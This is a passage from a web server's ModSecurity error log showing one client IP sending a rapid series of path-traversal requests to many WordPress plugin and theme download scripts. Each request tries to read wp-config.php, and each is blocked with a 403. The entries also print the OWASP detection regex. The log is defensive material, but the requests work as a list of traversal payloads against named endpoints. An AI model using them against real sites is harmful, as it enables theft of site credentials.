140447083120384] [client 37.120.213.169:41636] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-manager/views/file_download.php?fname=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-manager/views/file_download.php"] [unique_id "ZEeemCIlOCjnXl5KlpegdAAAAEk"] [Tue Apr 25 04:34:16.769982 2023] [:error] [pid 15578:tid 140446999193344] [client 37.120.213.169:41638] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZEeemD754oNYNW-15_AYeQAAABM"] [Tue Apr 25 04:34:16.906563 2023] [:error] [pid 15579:tid 140446957229824] [client 37.120.213.169:41640] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php"] [unique_id "ZEeemCIlOCjnXl5KlpegdQAAAFg"] [Tue Apr 25 04:34:17.032097 2023] [:error] [pid 15580:tid 140446999193344] [client 37.120.213.169:41642] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-dock-gallery/macdownload.php"] [unique_id "ZEeemd-GjcOLRjW9Sa4WKQAAAJM"] [Tue Apr 25 04:34:17.939005 2023] [:error] [pid 15889:tid 140446965622528] [client 37.120.213.169:41646] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php"] [unique_id "ZEeemV4G6tVEc6w5Us7gkQAAANc"] [Tue Apr 25 04:34:18.065083 2023] [:error] [pid 15889:tid 140447186380544] [client 37.120.213.169:41648] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "ZEeeml4G6tVEc6w5Us7gkgAAAMU"] [Tue Apr 25 04:34:18.190001 2023] [:error] [pid 15889:tid 140447108298496] [client 37.120.213.169:41650] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "ZEeeml4G6tVEc6w5Us7gkwAAAMY"] [Tue Apr 25 04:34:18.315407 2023] [:error] [pid 15889:tid 140447007586048] [client 37.120.213.169:41652] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "ZEeeml4G6tVEc6w5Us7glAAAANI"] [Tue Apr 25 04:34:18.441137 2023] [:error] [pid 15889:tid 140447211558656] [client 37.120.213.169:41654] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "ZEeeml4G6tVEc6w5Us7glQAAAMI"] [Tue Apr 25 04:34:18.567405 2023] [:error] [pid 15889:tid 140447194773248] [client 37.120.213.169:41656] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=..%2F..%2F..%2Fwp-config.php&info=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cip4-folder-download-widget/cip4-download.php"] [unique_id "ZEeeml4G6tVEc6w5Us7glgAAAMQ"] [Tue Apr 25 04:34:19.468697 2023] [:error] [pid 15889:tid 140447066334976] [client 37.120.213.169:41662] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/duena/download.php?f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/duena/download.php"] [unique_id "ZEeem14G6tVEc6w5Us7gmAAAAMs"] [Tue Apr 25 04:34:19.595594 2023] [:error] [pid 15578:tid 140447041156864] [client 37.120.213.169:41664] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/endlesshorizon/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/endlesshorizon/download.php"] [unique_id "ZEeemz754oNYNW-15_AYegAAAA4"] [Tue Apr 25 04:34:19.721444 2023] [:error] [pid 15580:tid 140446990800640] [client 37.120.213.169:41666] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZEeem9-GjcOLRjW9Sa4WKgAAAJQ"] [Tue Apr 25 04:34:19.854414 2023] [:error] [pid 15579:tid 140447091513088] [client 37.120.213.169:41668] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZEeemyIlOCjnXl5KlpegdwAAAEg"] [Tue Apr 25 04:34:19.980637 2023] [:error] [pid 15578:tid 140447024371456] [client 37.120.213.169:41670] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "ZEeemz754oNYNW-15_AYewAAABA"] [Tue Apr 25 04:34:20.106084 2023] [:error] [pid 15580:tid 140447203165952] [client 37.120.213.169:41672] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zip-attachments/download.php?za_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZEeenN-GjcOLRjW9Sa4WKwAAAIM"] [Tue Apr 25 04:34:20.979744 2023] [:error] [pid 15580:tid 140447194773248] [client 37.120.213.169:41676] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZEeenN-GjcOLRjW9Sa4WLQAAAIQ"] [Tue Apr 25 04:34:22.145987 2023] [:error] [pid 15889:tid 140447091513088] [client 37.120.213.169:41680] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php"] [unique_id "ZEeenl4G6tVEc6w5Us7gmQAAAMg"] [Tue Apr 25 04:34:22.293999 2023] [:error] [pid 15578:tid 140447007586048] [client 37.120.213.169:41682] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/authentic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/authentic/includes/download.php"] [unique_id "ZEeenj754oNYNW-15_AYfAAAABI"] [Tue Apr 25 04:34:22.431025 2023] [:error] [pid 15578:tid 140446957229824] [client 37.120.213.169:41684] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/acento/includes/view-pdf.php?download=1&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/acento/includes/view-pdf.php"] [unique_id "ZEeenj754oNYNW-15_AYfQAAABg"] [Tue Apr 25 04:34:22.575640 2023] [:error] [pid 15578:tid 140447066334976] [client 37.120.213.169:41686] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/fiestaresidences/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fiestaresidences/download.php"] [unique_id "ZEeenj754oNYNW-15_AYfgAAAAs"] [Tue Apr 25 04:34:22.727544 2023] [:error] [pid 15889:tid 140447041156864] [client 37.120.213.169:41688] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/optimus/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/optimus/download.php"] [unique_id "ZEeenl4G6tVEc6w5Us7gmgAAAM4"] [Tue Apr 25 04:34:22.877334 2023] [:error] [pid 15889:tid 140447049549568] [client 37.120.213.169:41690] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match 